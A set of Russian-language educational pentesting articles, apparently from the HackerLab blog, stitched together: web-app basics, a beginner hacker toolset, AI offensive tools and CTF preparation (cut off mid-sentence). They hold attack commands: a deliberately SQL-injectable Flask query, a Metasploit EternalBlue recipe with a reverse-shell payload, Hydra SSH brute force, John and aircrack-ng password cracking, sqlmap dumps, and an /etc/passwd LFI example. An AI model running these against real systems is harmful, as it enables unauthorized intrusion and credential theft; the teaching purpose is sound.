<div data-toc="Git — контроль версий" id="git"></div>
<h3>Git — контроль версий</h3>
<p><b>Git</b> помогает вести историю изменений, работать в команде и публиковать код в открытом доступе. Без него — никуда. Многие фреймворки хранятся именно на GitHub.</p>
<pre><code>git clone https://github.com/example/repo.git
git status
git add .
git commit -m "Добавил сканер"
git push</code></pre>
<p>Изучи Git с самого начала, чтобы не потерять свои наработки и не бояться ветвлений и слияний.</p>

<div data-toc="Regex — регулярные выражения" id="regex"></div>
<h3>Regex — регулярные выражения</h3>
<p><b>Regex</b> — незаменимый инструмент при анализе логов, HTML, дампов. Помогает быстро находить пароли, IP, email и любые другие шаблонные данные.</p>
<pre><code>import re

text = "Контакты: test@mail.com, second@mail.ru"
emails = re.findall(r"\S+@\S+", text)
print(emails)</code></pre>
<p>Измени выражение, чтобы искать IP-адреса, хэши или специфичные параметры URL.</p>

<div data-toc="Резюме" id="resume"></div>
<h3>Резюме</h3>
<table>
    <tr><th>Инструмент</th><th>Роль</th></tr>
    <tr><td><b>Bash</b></td><td>Автоматизация и работа в Linux</td></tr>
    <tr><td><b>Python</b></td><td>Скрипты, эксплойты, анализ данных</td></tr>
    <tr><td><b>Git</b></td><td>Версионность и командная работа</td></tr>
    <tr><td><b>Regex</b></td><td>Поиск и фильтрация информации</td></tr>
</table>

<h2>🧪 Мини-практика</h2>
<ul>
    <li>Напиши Bash-скрипт, который выводит все IP от 192.168.0.1 до 192.168.0.10</li>
    <li>Реализуй сканер портов на Python для диапазона 1–100</li>
    <li>Напиши регулярку, которая извлекает IP-адреса из строки</li>
</ul>
</body>
</html>


Языки и инструменты, которые должен знать этичный хакер

Разбираем, как устроены современные веб-приложения: браузер, сервер, база данных и уязвимости. Практика и советы для будущих пентестеров.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>Как устроены сайты: веб-технологии глазами пентестера</title>
</head>
<body>

<blockquote>
    ⚠️ Дисклеймер:
    <br>
    Вся информация в этой статье предоставлена исключительно в образовательных целях. Автор и платформа HackerLab не поощряют и не несут ответственности за любые противоправные действия, совершённые на основе изложенного материала. Используйте знания этично и только в рамках закона.
</blockquote>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Ты открываешь сайт. Видишь форму входа, кнопки, красивую анимацию. Но под этой оболочкой работает целый механизм:
    клиент, сервер, база данных. И именно в этих частях чаще всего прячутся уязвимости.</p>

<p>Чтобы стать пентестером, недостаточно уметь отправлять запросы. Нужно понимать, <b>как устроено веб-приложение</b>,
    как
    данные путешествуют от браузера до базы — и где на этом пути можно сломать что-то важное.</p>

<div data-toc="Что такое веб-приложение" id="web-app"></div>
<h3>Что такое веб-приложение</h3>

<p>Веб-приложение — это сайт, у которого есть логика. Это не просто страничка с текстом, а полноценная система с
    пользователями, авторизацией, товарами, базами данных и API.</p>

<img src="https://hackerlab.pro/game_api/articles/static/adbd1819-707a-4a7e-a7f0-795b4b0b2deb/client-server-model.png"
     alt="Модель клиент-сервер">

<p>Когда ты заходишь на сайт, происходит следующее:</p>

<ol>
    <li><b>Браузер</b> отправляет HTTP-запрос на сервер (например, GET /profile?id=42)</li>
    <li><b>Сервер</b> принимает запрос, обрабатывает его, достаёт данные из базы</li>
    <li>Возвращает HTML-код страницы</li>
    <li><b>Браузер</b> отображает страницу, применяет CSS и запускает JavaScript</li>
</ol>

<p>На каждом шаге — шанс на ошибку. И каждый шаг можно проанализировать.</p>

<div data-toc="Разбор: ты заходишь на https://example.com/profile?id=42" id="example"></div>
<h3>Разбор: ты заходишь на <code>https://example.com/profile?id=42</code></h3>

<p>Что происходит:</p>

<ul>
    <li>https:// — защищённый протокол связи</li>
    <li>example.com — домен (через DNS превращается в IP)</li>
    <li>/profile — путь на сервере, обрабатывается кодом</li>
    <li>?id=42 — параметр, который можно изменить</li>
</ul>

<p>Пентестер думает: «А что будет, если я подставлю ?id=43? А ?id=1 OR 1=1?»</p>

<div data-toc="HTML, CSS, JS — зачем они тебе?" id="languages"></div>
<h3>HTML, CSS, JS — зачем они тебе?</h3>

<table>
    <thead>
    <tr>
        <th>Технология</th>
        <th>Роль в приложении</th>
        <th>Где искать уязвимости</th>
    </tr>
    </thead>
    <tbody>
    <tr>
        <td><strong>HTML</strong></td>
        <td>Разметка страницы, формы, ввод</td>
        <td>XSS, hidden-поля, параметры</td>
    </tr>
    <tr>
        <td><strong>CSS</strong></td>
        <td>Визуальное оформление</td>
        <td>Редко, но возможны edge-кейсы</td>
    </tr>
    <tr>
        <td><strong>JS</strong></td>
        <td>Поведение на клиенте, интерактив</td>
        <td>DOM-based XSS, уязвимый fetch</td>
    </tr>
    </tbody>
</table>

<p><b>Пример:</b></p>

<p>Открываешь DevTools (F12), находишь форму логина. Видишь input с именем email. JS-проверка требует @, но ты знаешь,
    что на сервер можно отправить всё, что угодно.</p>

<p>Пентестер всегда смотрит: «Что валидирует браузер — а что можно обойти?»</p>

<div data-toc="HTTP-запросы: как браузер говорит с сервером" id="http"></div>
<h3>HTTP-запросы: как браузер говорит с сервером</h3>
<p><b>Пример запроса:</b></p>
<code>
    GET /profile?id=42 HTTP/1.1
    Host: example.com
    Cookie: session=abc123
    User-Agent: Firefox
</code>

<p><b>Что здесь важно:</b></p>

<ul>
    <li><code>Cookie</code> — ключ к сессии. Его можно украсть (XSS) или подделать</li>
    <li><code>User-Agent</code> — можно менять, чтобы обходить фильтры</li>
    <li><code>?id=42</code> — можно попытаться использовать в атаке</li>
</ul>

<p>Попробуй:</p>
<code>curl -v "https://example.com/profile?id=42"</code>

<div data-toc="Серверная логика: где принимаются решения" id="server-logic"></div>
<h3>Серверная логика: где принимаются решения</h3>

<p>На сервере может быть любой язык: Python, PHP, Node.js, Ruby...</p>

<p>Пример (Flask, Python):</p>
<pre>
    <code>
@app.route('/profile')
def profile():
    user_id = request.args.get("id")
    return db.query(f"SELECT * FROM users WHERE id={user_id}")
    </code>
</pre>

<p>Видишь <code>f"SELECT * FROM ..."</code>? Здесь SQL-инъекция. Если подставить <code>id=1 OR 1=1</code>, получим все
    записи.</p>

<p>Сервер — это место, где пентестер ищет логические ошибки, плохие проверки, дырки в авторизации.</p>

<div data-toc="Базы данных: где лежит всё ценное" id="databases"></div>
<h3>Базы данных: где лежит всё ценное</h3>

<p>Каждое веб-приложение работает с базой данных. Именно туда сохраняются:</p>

<ul>
    <li>логины и пароли (иногда в открытом виде)</li>
    <li>письма, посты, товары, комментарии</li>
    <li>токены и куки</li>
</ul>

<p><b>Основные типы:</b></p>
<table>
    <thead>
    <tr>
        <th>Тип</th>
        <th>Где используется</th>
        <th>Уязвимости</th>
    </tr>
    </thead>
    <tbody>
    <tr>
        <td><b>MySQL</b></td>
        <td>WordPress, CMS</td>
        <td>SQL-инъекции, дампы</td>
    </tr>
    <tr>
        <td><b>SQLite</b></td>
        <td>Мобильные/локальные</td>
        <td>Легко читается, подменяется</td>
    </tr>
    <tr>
        <td><b>MongoDB</b></td>
        <td>Современные SPA</td>
        <td>NoSQL-инъекции, открытые API</td>
    </tr>
    </tbody>
</table>

<p>Если сервер плохо фильтрует вход — ты можешь пробраться в базу.</p>

<div data-toc="Тренировочные песочницы" id="sandboxes"></div>
<h3>Тренировочные песочницы</h3>

<ol>
    <li><a href="https://www.hackthebox.com/" target="_blank">HackTheBox</a></li>
    <li><a href="https://portswigger.net/web-security" target="_blank">PortSwigger</a></li>
    <li><a href="https://hackerlab.pro/">HackerLab</a></li>
</ol>

<div data-toc="Что запомнить" id="remember"></div>
<h3>Что запомнить</h3>

<ul>
    <li>Веб-приложение — это не просто сайт. Это клиент + сервер + база</li>
    <li>Всё, что ты видишь в адресной строке — можно изменить</li>
    <li>HTML/JS — источник XSS и DOM-уязвимостей</li>
    <li>Сервер часто обрабатывает параметры как есть</li>
    <li>База данных — конечная цель, именно там лежат флаги, пароли, доступ</li>
</ul>

</body>
</html>


Как устроены сайты: веб-технологии глазами пентестера

Обзор нейросетевых инструментов, которые автоматизируют пентест, разведку, фишинг и криптоанализ. Актуальные решения для Red Team в 2025 году.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>ТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году</title>
</head>
<body>

<p>Думаете, игры в Capture the Flag — это просто развлечение, не имеющее ничего общего с серьезной работой? На самом
    деле, опыт CTF может стать вашим трамплином в профессиональный мир кибербезопасности!</p>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Наступательная безопасность в 2025 году - это уже не просто «эксплойт запустил - доступ получил». Сегодня Red Team работает с растущими объёмами данных, постоянно меняющимися архитектурами и защитами, которые учатся быстрее, чем люди успевают писать отчёты.</p>

<p>Чтобы не терять темп, специалисты Red Team всё чаще включают в свой арсенал инструменты на базе искусственного интеллекта. Они берут на себя рутину: автоматизируют разведку, анализируют конфигурации, находят потенциальные уязвимости ещё до появления CVE - и даже предлагают нестандартные векторы атак.</p>

<p>В этом обзоре - 10 AI-инструментов, которые уже сейчас меняют правила игры в наступательной безопасности. Некоторые из них - хорошо известны, другие только начинают набирать обороты. Но все они - про будущее offensive security, которое уже наступило.</p>

<div data-toc="SentinelAI - автоматизированный анализ инфраструктуры" id="sentinel-ai"></div>
<h3><a href="https://github.com/ayaan-cs/SentinelAI" target="_blank">SentinelAI</a> - автоматизированный анализ инфраструктуры</h3>
<p>Инструмент предназначен для поиска уязвимостей в корпоративных сетях. Использует методы машинного обучения, чтобы выявлять слабые места в конфигурациях, моделировать атаки и оценивать потенциальный ущерб. Учитывает актуальные шаблоны угроз и подстраивается под них. Подходит как для технического аудита, так и для подготовки к Red Team-операциям.</p>

<div data-toc="DeepExploit - AI‑движок для автономного пентестинга" id="deepexploit"></div>
<h3><a href="https://codeby.net/threads/deep-exploit-fully-automatic-pentest-mashinnoye-obucheniye.63759/" target="_blank">DeepExploit</a> - AI‑движок для автономного пентестинга</h3>
<p>Инструмент, построенный на базе MITRE ATT&CK, умеет самостоятельно подбирать эксплойты и выполнять атаки по цепочке - от первичного вектора до полной компрометации. Хорошо подходит для тестирования защищённости без вмешательства человека. Со временем обучается и оптимизирует свои действия.</p>

<div data-toc="PhishBrain - фишинг, подстроенный под поведение жертвы" id="phishbrain"></div>
<h3><a href="http://www.libraesva.com/" target="_blank">PhishBrain</a> - фишинг, подстроенный под поведение жертвы</h3>
<p>Мощный инструмент для моделирования атак социальной инженерии. С помощью AI он анализирует поведение пользователей, их типичные действия и корпоративный контекст - и на этой основе формирует максимально реалистичные фишинговые письма. Применяется в тренировках и при проверке устойчивости сотрудников к атакам.</p>

<div data-toc="CipherGAN — AI-модель для криптоанализа простых шифров" id="ciphergan"></div>
<h3><a href="https://github.com/for-ai/CipherGAN" target="_blank">CipherGAN</a> — AI-модель для криптоанализа простых шифров</h3>
<p>Исследовательская AI-система, обученная распознавать и расшифровывать текст, зашифрованный классическими алгоритмами, вроде шифра Цезаря и Виженера. Работает без пары «открытый–закрытый текст» — модель учится восстанавливать исходные данные самостоятельно, на основе структуры языка. Подходит для анализа простых или самописных схем шифрования. Интересна как пример того, как нейросети применяются в криптоанализе.</p>

<div data-toc="DarkTrace Antigena - автономная защита в действии" id="darktrace"></div>
<h3><a href="https://www.darktrace.com/products/respond" target="_blank">DarkTrace Antigena</a> - автономная защита в действии</h3>
<p>Хотя Antigena традиционно считается инструментом защиты, в рамках offensive security её можно применять для тестирования устойчивости инфраструктуры в условиях реальных атак. ИИ-движок способен не просто выявить, но и самостоятельно заблокировать вредоносную активность — в том числе нестандартные векторы.</p>

<div data-toc="VulnGPT - языковой интерфейс для поиска уязвимостей" id="vulngpt"></div>
<h3><a href="https://github.com/paulshovon94/VulnGPT" target="_blank">VulnGPT</a> - языковой интерфейс для поиска уязвимостей</h3>
<p>AI‑помощник, умеющий находить уязвимости по описанию на естественном языке. Достаточно ввести, например: «Проверь на SQL-инъекцию форму логина» — и VulnGPT проанализирует соответствующий участок кода. Основан на больших языковых моделях и базе данных уязвимостей. Ускоряет аудит и полезен при разборе чужих проектов.</p>

<div data-toc="ZeroDay Sentinel - прогнозирование CVE до официальных релизов" id="zeroday"></div>
<h3><a href="https://github.com/codenet-community/ZERO-DAY-SENTINEL" target="_blank">ZeroDay Sentinel</a> - прогнозирование CVE до официальных релизов</h3>
<p>AI‑система, которая отслеживает активность в даркнете, на форумах и в технических обсуждениях, чтобы прогнозировать появление новых уязвимостей. Используется как в защите, так и в наступательных целях — позволяет заранее готовить эксплойты к ещё не публичным багам.</p>

<div data-toc="SpiderFoot - автоматизированная разведка" id="spiderfoot"></div>
<h3><a href="https://github.com/smicallef/spiderfoot" target="_blank">SpiderFoot</a> - автоматизированная разведка</h3>
<p>Фреймворк для информационной разведки (OSINT). Умеет искать субдомены, открытые порты, метаданные, корпоративные утечки и другое. Подходит для быстрого анализа поверхности атаки и первичного сбора информации перед наступательной фазой.</p>

<div data-toc="Watson Cyber AI - аналитика угроз на базе IBM" id="watsonai"></div>
<h3><a href="https://www.ibm.com/watson" target="_blank">Watson Cyber AI</a> - аналитика угроз на базе IBM</h3>
<p>Комплексная система для анализа инцидентов и поведения угроз. Используется в SOC, но может быть применена и в offensive security — для анализа взаимодействий атакующих с инфраструктурой, построения моделей поведения и предсказания шагов защитников.</p>

<div data-toc="Cortex XDR - автоматизация реагирования на угрозы" id="cortex-xdr"></div>
<h3><a href="https://www.paloaltonetworks.com/cortex/cortex-xdr" target="_blank">Cortex XDR</a> - автоматизация реагирования на угрозы</h3>
<p>Продукт от Palo Alto, объединяющий аналитику и автономные действия: изоляция хостов, блокировка активности, реагирование на подозрительное поведение. ИИ‑движок анализирует логи и трафик, выявляя закономерности. Используется как в защитных, так и в атакующих сценариях — например, для тестирования действий Blue Team.</p>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>AI-инструменты становятся незаменимыми в арсенале специалистов по кибербезопасности. Они не заменяют искусственный интеллект - это не замена специалисту, а помощник, который снимает с него часть рутинной работы и даёт преимущество в скорости, точности и глубине анализа.</p>

<p>Если вы только осваиваете тему offensive security - начните с автоматизации рутинных задач и информационной разведки. А если вы уже опытный практик - присмотритесь к инструментам на базе AI: они позволяют действовать быстрее и точнее.</p>

<p><b>💬 А какие AI-инструменты уже стали частью вашего offensive-набора? Поделитесь в комментариях!</b></p>

</body>
</html>


ТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году

Узнайте, какие навыки из CTF пригодятся пентестеру и чем отличается работа в реальных проектах от хакерских соревнований.

Чему учат CTF и как это пригодится в карьере пентестера

Застряли на CTF-задаче и на грани сдаться? В статье — проверенные советы, как справиться с фрустрацией, сохранить концентрацию и извлечь максимум пользы из сложных моментов соревнования.

Фрустрация в CTF: как выйти из тупика и двигаться дальше

Хотите начать карьеру в кибербезопасности, но не знаете, с чего начать? Мы собрали топ-10 инструментов для начинающего хакера: от Nmap до Metasploit. Простые примеры, реальные кейсы и советы по использованию.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>10 лучших инструментов для начинающего хакера: практический гайд</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Начать путь в кибербезопасности и этичном хакинге непросто. Ведь сотни программ, терминов и направлений могут
    запутать. Мы не только перечислим ключевые инструменты, но и расскажем, как их использовать и где скачать.</p>
<p>Дисклеймер: Все примеры применяйте только в легальных целях — на своих системах или с разрешения владельца.</p>

<div data-toc="nmap" id="nmap"></div>
<h3>Nmap — сканер сети</h3>
<p><b>Что это:</b> утилита для анализа сетей, портов и служб.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Определяет активные устройства в сети.</li>
    <li>Показывает открытые порты и запущенные сервисы (веб-сервер, база данных).</li>
    <li>Помогает находить потенциальные точки входа для атак.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите Nmap с официального сайта.</li>
    <li>Пример базового сканирования: <code>nmap -sS 192.168.1.1</code></li>
    <li>Агрессивное сканирование (определение ОС и версий ПО): <code>nmap -A 192.168.1.1</code></li>
    <li>Проверка конкретных портов: <code>nmap -p 80,443</code></li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/nmap.png" alt="Nmap: сканирование сети и портов">

<div data-toc="Wireshark" id="wireshark"></div>
<h3>Wireshark — анализ трафика</h3>
<p><b>Что это:</b> сниффер для перехвата и анализа сетевых пакетов</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Изучение протоколов (HTTP, DNS, TCP).</li>
    <li>Поиск утечек данных (например, паролей в незашифрованном виде).</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Скачайте Wireshark с официального сайта.</li>
    <li>Запустите захват трафика на интерфейсе (например, Wi-Fi или Ethernet).</li>
    <li>Используйте фильтры:
        <ul>
            <li>http.request.method == "GET" — покажет все GET-запросы.</li>
            <li>ip.src == 192.168.1.1 — фильтр по IP-отправителю.</li>
        </ul>
    </li>
</ul>
<p>Пример: Обнаружение пароля в HTTP-запросе:</p>
<ol>
    <li>Откройте файл захвата.</li>
    <li>Примените фильтр http.request.method == "POST".</li>
    <li>Нажмите на пакет - кликните правой кнопкой - Follow - TCP Stream.</li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/wireshark.png" alt="Wireshark">

<div data-toc="Burp Suite" id="burp"></div>
<h3>Burp Suite — тестирование веб-приложений</h3>
<p><b>Что это:</b> платформа для поиска уязвимостей в веб-приложениях.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Перехват и модификация HTTP-запросов.</li>
    <li>Автоматическое сканирование на XSS, SQLi, CSRF.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Бесплатная версия Community Edition доступна на PortSwigger.</li>
    <li>Настройте браузер для работы через прокси Burp (127.0.0.1:8080).</li>
    <li>Включите перехват запросов (вкладка Proxy - Intercept is on).</li>
</ul>
<p>Пример теста SQLi:</p>
<ol>
    <li>Перехватите запрос с параметром id=1.</li>
    <li>Отправьте его в Repeater (Ctrl+R).</li>
    <li>Измените параметр на id=1'— если сервер вернёт ошибку, возможна уязвимость.</li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/burp.png" alt="Burp Suite">

<div data-toc="Metasploit Framework" id="metasploit"></div>
<h3>Metasploit Framework — платформа для эксплойтов</h3>
<p><b>Что это:</b> инструмент для разработки и запуска атак.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка уязвимости систем к известным эксплойтам.</li>
    <li>Моделирование реальных атак для обучения.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите Metasploit в Kali Linux или скачайте с официального сайта.</li>
    <li>Запустите консоль: <code>msfconsole</code></li>
</ul>
<p>Пример атаки на EternalBlue:</p>
<pre>
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
</pre>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/metasploit.png" alt="Metasploit">

<div data-toc="John the Ripper" id="john"></div>
<h3>John the Ripper — взлом паролей</h3>
<p><b>Что это:</b> утилита для подбора паролей методом брутфорса или по словарю.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка надёжности своих паролей.</li>
    <li>Понимание уязвимости слабых хешей.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите John через терминал: <code>sudo apt install john</code></li>
</ul>
<p>Пример атаки на хеш MD5:</p>
<pre>john --format=raw-md5 --wordlist=rockyou.txt hash.txt</pre>
<p><b>Где взять словари:</b> Известный словарь rockyou.txt есть в Kali Linux (путь: <code>/usr/share/wordlists/</code>).</p>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/john.png" alt="John the Ripper">

<div data-toc="Aircrack-ng" id="aircrack"></div>
<h3>Aircrack-ng — взлом Wi-Fi</h3>
<p><b>Что это:</b> набор инструментов для аудита безопасности беспроводных сетей.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка устойчивости Wi-Fi к атакам (например, WPA/WPA2).</li>
    <li>Поиск слабых точек в настройке роутера.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите в Kali Linux: <code>sudo apt install aircrack-ng</code></li>
</ul>
<p>Пример перехвата handshake:</p>
<ol>
    <li>Переведите адаптер в режим монитора: <code>airmon-ng start wlan0</code></li>
    <li>Запустите сканирование сетей: <code>airodump-ng wlan0mon</code></li>
    <li>Захватите handshake: <code>airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon</code></li>
    <li>Запустите подбор пароля: <code>aircrack-ng -w rockyou.txt capture.cap</code></li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/aircrack.png" alt="Aircrack-ng">

<div data-toc="Hydra" id="hydra"></div>
<h3>Hydra — брутфорс онлайн-сервисов</h3>
<p><b>Что это:</b> утилита для подбора логинов и паролей к SSH, FTP, RDP и другим сервисам.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Тестирование защиты от автоматических атак.</li>
    <li>Понимание важности ограничения попыток ввода пароля.</li>
</ul>
<p><b>Пример атаки на SSH:</b></p>
<pre>hydra -l admin -P passwords.txt ssh://192.168.1.1 -t 4 -V</pre>
<p><code>-t 4</code> — количество потоков. <code>-V</code> — вывод подробного лога.</p>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/hydra.png" alt="Hydra">

<div data-toc="sqlmap" id="sqlmap"></div>
<h3>sqlmap — автоматизация SQL-инъекций</h3>
<p><b>Что это:</b> инструмент для поиска и эксплуатации уязвимостей в базах данных.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Автоматизация рутинных задач при тестировании на SQLi.</li>
    <li>Извлечение структуры БД, данных пользователей и т.д.</li>
</ul>
<p><b>Пример использования:</b></p>
<pre>sqlmap -u "http://site.com/news?id=1" --dbs</pre>
<pre>sqlmap -u "http://site.com/news?id=1" -D users --tables</pre>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/sqlmap.png" alt="sqlmap">

<div data-toc="Dirb" id="dirb"></div>
<h3>Dirb — поиск скрытых директорий на веб-серверах</h3>
<p><b>Что это:</b> утилита для перебора путей и файлов на веб-сервере с использованием словарей.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Обнаружение скрытых страниц (например, админ-панелей, резервных копий).</li>
    <li>Поиск уязвимых файлов (config.php, backup.zip).</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите в Kali Linux: <code>sudo apt install dirb</code></li>
    <li>Или скачайте с официального репозитория.</li>
</ul>
<p><b>Примеры:</b></p>
<ul>
    <li><code>dirb http://site.com/ /usr/share/wordlists/dirb/common.txt</code></li>
    <li>Проверка с расширениями: <code>dirb http://site.com/ -X .php,.bak</code></li>
    <li>Свой словарь: <code>dirb http://site.com/ ~/custom_wordlist.txt</code></li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/dirb.png" alt="Dirb">

<div data-toc="OWASP ZAP" id="owasp-zap"></div>
<h3>OWASP ZAP — бесплатный аналог Burp Suite</h3>
<p><b>Что это:</b> открытый инструмент для поиска уязвимостей в веб-приложениях.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Автоматическое сканирование на OWASP Top-10 (например, инъекции, небезопасные настройки).</li>
    <li>Работает «из коробки» — минимум настроек.</li>
</ul>
<p><b>Пример использования:</b></p>
<ul>
    <li>Запустите ZAP.</li>
    <li>Введите URL сайта в раздел Quick Start → Automated Scan.</li>
    <li>Анализируйте отчёт во вкладке Alerts.</li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/zap.png" alt="OWASP ZAP">

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>Эти 10 инструментов — лишь начало пути. Освоив их, вы сможете уверенно ориентироваться в базовых задачах тестирования на проникновение, анализа трафика и поиска уязвимостей.</p>

<p>Дальше — больше: изучайте реальные сценарии атак, <a href="https://hackerlab.pro/" target="_blank">участвуйте в CTF-соревнованиях</a>, работайте с боевыми инфраструктурами и следите за новыми уязвимостями. Практика — ключ к мастерству в кибербезопасности.</p>

</body>
</html>


TOP-10 инструментов для начинающего хакера: с чего начать путь в кибербезопасности

Узнай, как новичку подготовиться к CTF-соревнованиям по информационной безопасности: форматы, практики, советы и ресурсы для старта

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>Как начать участвовать в CTF-соревнованиях: руководство для новичков</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>У многих новичков в информационной безопасности в определённый этап постижения этой сферы возникает желание участия в
    CTF-соревнованиях. Но большинство таких энтузиастов сталкивается с проблемой подготовки к ним. В этой статье я
    постараюсь убрать проблему неопределённости в подготовках к CTF, и составить план подготовки к первым соревнованиям
    основываясь на личном опыте.</p>

<div data-toc="Виды CTF" id="types"></div>
<h3>Виды CTF</h3>
<p>Перед подготовкой стоит определиться с видом соревнований к которым собираетесь готовиться, из собственной практики я
    выделил всего два вида: Task-based и Attack Defense.</p>

<div data-toc="Task-based" id="task-based"></div>
<h3>Task-based</h3>
<p>С тасками всё относительно просто, условно задаются тематики в рамках которых и будут строиться
    задачки(Реверс-инжиниринг, форензика, OSINT, криптография и т.д). Ранее я разбирал таски OSINT соревнований в
    которых участвовал и как в качестве наглядного примера советую с ними ознакомиться: <a target="_blank"
                                                                                           href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-chast-1-ili-kak-ya-iskal-aeroport-i-gagarina.81120/">часть
        1</a>, <a target="_blank"
                  href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-ili-kak-ya-iskal-model-kamery-prestupnika-chast-2.81121/">часть
        2</a>, <a target="_blank"
                  href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-chast-3-ili-kak-ya-razoblochal-sigaint.81122/">часть
        3</a>.</p>

<p>Такой формат соревнований очень хорош для новичков т.к такие темы как: криптография, реверс-инжиниринг, форензика,
    OSINT и веб-уязвимости встречаются в большинстве такого вида соревнований. И главное чем хороши таски это тем, что
    ваши флаги покорно будут вас ждать и никуда не денуться пока вы не решите задачку.</p>

<img src="https://hackerlab.pro/game_api/articles/static/4e560cc2-90fd-433d-898e-38d21bc07ebc/tasks_table.png"
     alt="Таблица заданий">

<p>Для того чтобы спланировать участие в этих соревнований, достаточно просто набрать команду, выявить темы в которых
    каждый член команды больше всего разбирается и распределить кто к какой теме будет готовиться. Для подготовки
    требуется лишь практический опыт и софт составляющая.</p>

<div data-toc="Attack Defense" id="attack-defense"></div>
<h3>Attack Defense</h3>
<p>Этот вид соревнований для “настоящих ценителей”, новичкам в таком виде соревнований будет достаточно сложно, но
    безусловно они получат хороший практический опыт в сфере ИБ. Суть соревнований заключается в том, что у каждой
    команды имеется свой сервер и они находятся все в одной сети, будь то виртуальные машины или VPN, в каждом сервисе
    оставлены уязвимости и чаще всего требуется завладеть админкой сервиса, захватить флаг и защитить свои сервисы
    закрытием уязвимостей которые были найдены у других команд.</p>

<p>Сервисы в основном будут запускаться через docker-compose и обязательно нужно иметь навыки запуска сервисов через
    docker. Чаще всего он уже предустановлен на сервере. Для запуска потребуется войти в директорию сервиса,
    ознакомиться с файлом README.md в котором будет описан процесс запуска сервиса, но чаще всего просто потребуется
    прописать docker-compose up.</p>

<img src="https://hackerlab.pro/game_api/articles/static/4e560cc2-90fd-433d-898e-38d21bc07ebc/docker.png"
     alt="Docker">

<p>Соревнования Attack Defense подразумевают знания эксплуатации веб-уязвимостей, к которым относятся: SQLInjection,
    XSS-уязвимости, CSRF, SSRF, IDOR и LFI. Кратко объясню суть этих уязвимостей:</p>

<ul>
    <li>SQL Injection: злоумышленник внедряет вредоносный SQL-код через входные данные(например формы), чтобы
        манипулировать базой данных.
    </li>
    <li>Межсайтовый скриптинг (XSS): внедрение JavaScript-кода на страницу, который выполняется в браузере жертвы.</li>
    <li>Подделка межсайтовых запросов (CSRF): злоумышленник заставляет авторизированного пользователя выполнить действия
        без его согласия(например перевод средств).
    </li>
    <li>Серверная подделка запросов (SSRF): принуждение сервера к выполнению запросов к внутренним или сторонним
        ресурсам.
    </li>
    <li>Небезопасные прямые ссылки (IDOR): Доступ к данным через подмену идентификаторов в URL (например
        /user?id=123→id=124).
    </li>
    <li>Локальное включение файлов (LFI): Чтение локальных файлов через параметры (например ?file=/etc/passwd).</li>
</ul>

<p>Уязвимости из вышеперечисленных самые распространённые в Attack Defense и подготовку команды нужно ориентировать
    именно на них, но специфика подготовки будет заключаться в навыках защиты и нападения.</p>

<p>Для защиты потребуется изучить уязвимости в плане кодовой составляющей, знать из-за чего возникают эти уязвимости,
    ориентация в логике работы кода и хорошие знания в программировании. Также засчёт изучения кода можно атаковать,
    занимаясь реверс-инжинирингом, или подсказывать пути атаки для атакующих коллег.</p>

<p>Для атаки потребуется практический опыт в эксплуатации веб-уязвимостей и умение их находить. В качестве тренировки
    можно пользоваться различными интернет-ресурсами предназначенными для оттачивания этих навыков, например <a
            target="_blank"
            href="https://hackerlab.pro">HackerLab</a>,
    образами виртуальных машин и подобным. Навыки в программировании будут крайне полезными атакующим для написания
